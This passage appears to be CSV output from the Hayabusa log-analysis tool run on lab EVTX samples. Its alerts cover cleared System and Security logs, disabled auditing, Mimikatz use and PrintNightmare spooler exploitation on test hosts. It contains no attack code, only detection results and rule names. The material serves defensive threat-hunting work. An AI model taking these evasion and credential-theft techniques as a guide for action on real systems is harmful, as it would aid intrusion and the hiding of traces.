admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.997 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.778 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
-2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 